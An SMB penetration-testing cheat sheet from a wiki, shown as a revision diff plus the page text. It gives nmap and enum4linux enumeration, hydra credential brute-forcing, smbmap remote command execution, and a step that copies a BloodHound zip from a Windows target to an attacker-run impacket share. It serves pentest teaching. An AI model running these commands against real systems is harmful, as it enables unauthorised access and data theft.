(making pretty) |
No edit summary |
||
| Line 84: | Line 84: | ||
smb> put sample.txt | smb> put sample.txt | ||
Download files recursively | Download files recursively below | ||
smb> mask "" | smb> mask "" | ||
smb> recurse ON | smb> recurse ON | ||
smb> prompt OFF | smb> prompt OFF | ||
smb> mget * | smb> mget * | ||
smbget -R smb://<target-ip>/somedir -U username # We can use smbget from our local machine as well | |||
smbget -R smb://<target-ip>/somedir -U username | |||
Specify workgroup | Specify workgroup | ||
| Line 100: | Line 102: | ||
as anonymous user | as anonymous user | ||
smbget smb://<target-ip>/somedir -U anonymous | smbget smb://<target-ip>/somedir -U anonymous password: anonymous | ||
password: anonymous | |||
Transfer a file from windows to my attacker machine | Transfer a file from windows to my attacker machine | ||
In your local kali make a directory that you want that file to go into. | In your local kali make a directory that you want that file to go into. | ||
Revision as of 14:22, 21 January 2023
SMB Pentesting
SMB stands for Server Message Block. Default ports are 445, 139.
Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory.
SMB Enumeration
Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.
nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip> Enum4Linux enumerates the users, share directories, etc.
enum4linux <target-ip> # Basic use.
enum4linux -a <target-ip> # All Enum.
enum4linux -v <target-ip> # Verbose.
enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share.
Smbmap
smbmap -H <target-ip> smbmap -H <target-ip> -R # Recursive lookup.
smbmap -u username -p password -H <target-ip> # Username and Password
smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command
Brute Force Credentials hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb
Connect with smbclient
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
Anonymous
smbclient //10.0.0.1/somedir -N
smbclient "//10.0.0.1/some dir" -N # use of ""
smbclient //10.0.0.1/somedir -U username # Specify shared directory
smbclient -L 10.0.0.1 -W WORKGROUP -U username # Specify workgroup
Commands in SMB
Once Connected we can find sensitive files or information and we love that as hackers dont we.
List Files
smb> ls
Download a file
smb> get sample.txt
Put a file can be txt,pdf,php etc..
smb> put sample.txt
Download files recursively below
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
smbget -R smb://<target-ip>/somedir -U username # We can use smbget from our local machine as well
Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
as anonymous user
smbget smb://<target-ip>/somedir -U anonymous password: anonymous
Transfer a file from windows to my attacker machine
In your local kali make a directory that you want that file to go into.
mk dir smb
Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)
Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.